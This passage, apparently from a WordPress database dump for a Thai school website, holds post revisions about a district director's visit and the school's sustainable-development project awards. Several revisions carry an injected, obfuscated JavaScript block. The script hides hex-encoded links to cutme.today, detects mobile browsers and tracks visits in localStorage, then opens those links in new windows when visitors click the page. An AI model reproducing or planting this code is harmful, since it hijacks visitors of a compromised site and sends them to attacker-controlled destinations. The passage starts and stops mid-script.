2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโตมื่อวันที่ 31 สิงหาคม 2567 นายสุเทพ ศรบุญทอง ผู้อำนวยการสำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 ได้นิเทศ และตรวจเยี่ยมโรงเรียนอนุบาลวัดพระโต โดยมีนายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ รองผู้อำนวยการ คณะครู บุคลากรทางการศึกษา และนักเรียนให้การต้อนรับ ได้เยี่ยมชมโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโตโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน โดยได้รับการสนับสนุนจากวิทยาลัยเกษตรและเทคโนโลยีศรีสะเกษ และการไฟฟ้าฝ่ายผลิตแห่งประเทศไทย ทำให้ได้รับรางวัลรองชนะเลิศอันดับ 2 ระดับประเทศ และรางวัลรองชนะเลิศอันดับ 1 ระดับประเทศ ในโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน ประเภทโรงเรียนที่ได้รับความรู้จากวิทยาลัยและใช้ได้ผลดีเด่น ในปี 2565 และในปี 2567','','inherit','closed','closed','','367-revision-v1','','','2024-09-12 13:45:23','2024-09-12 06:45:23','',367,'http://watprato.ssk.in.th/?p=385',0,'revision','',0),
(387,2,'2024-09-12 13:47:06','2024-09-12 06:47:06','<!-- wp:image {\"id\":373,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458199408_122175360092202781_7097423784924703217_n-1024x726.jpg\" alt=\"\" class=\"wp-image-373\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"978ada18\",\"mediaId\":368,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-978ada18\"><img class=\"gb-image gb-image-978ada18\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458225254_122175360044202781_5522903753949252187_n.jpg\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:image {\"id\":383,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458252036_122175357182202781_526320192492554342_n-1024x726.jpg\" alt=\"\" class=\"wp-image-383\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":384,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458290652_122175359900202781_4995696793881930390_n-1024x726.jpg\" alt=\"\" class=\"wp-image-384\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืนโรงเรียนอนุบาลวัดพระโตมื่อวันที่ 31 สิงหาคม 2567 นายสุเทพ ศรบุญทอง ผู้อำนวยการสำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต 1 ได้นิเทศ และตรวจเยี่ยมโรงเรียนอนุบาลวัดพระโต โดยมีนายอนุศักดิ์ พันธ์งาม ผู้อำนวยการเชี่ยวชาญ รองผู้อำนวยการ คณะครู บุคลากรทางการศึกษา และนักเรียนให้การต้อนรับเยี่ยมชมโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน โดยได้รับการสนับสนุนจากวิทยาลัยเกษตรและเทคโนโลยีศรีสะเกษ และการไฟฟ้าฝ่ายผลิตแห่งประเทศไทย ทำให้ได้รับรางวัลรองชนะเลิศอันดับ 2 ระดับประเทศ และรางวัลรองชนะเลิศอันดับ 1 ระดับประเทศ ในโครงการชีววิถีเพื่อการพัฒนาอย่างยั่งยืน ประเภทโรงเรียนที่ได้รับความรู้จากวิทยาลัยและใช้ได้ผลดีเด่น ในปี 2565 และในปี 2567','','inherit','closed','closed','','367-revision-v1','','','2024-09-12 13:47:06','2024-09-12 06:47:06','',367,'http://watprato.ssk.in.th/?p=387',0,'revision','',0),
(388,2,'2024-09-12 13:48:39','2024-09-12 06:48:39','<!-- wp:generateblocks/image {\"uniqueId\":\"b202dfb0\",\"mediaId\":389,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-b202dfb0\"><img class=\"gb-image gb-image-b202dfb0\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/458265014_122175356336202781_4190648388646234065_n.jpg\" alt=\"\" title=\"458265014_122175356336202781_4190648388646234065_n\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const 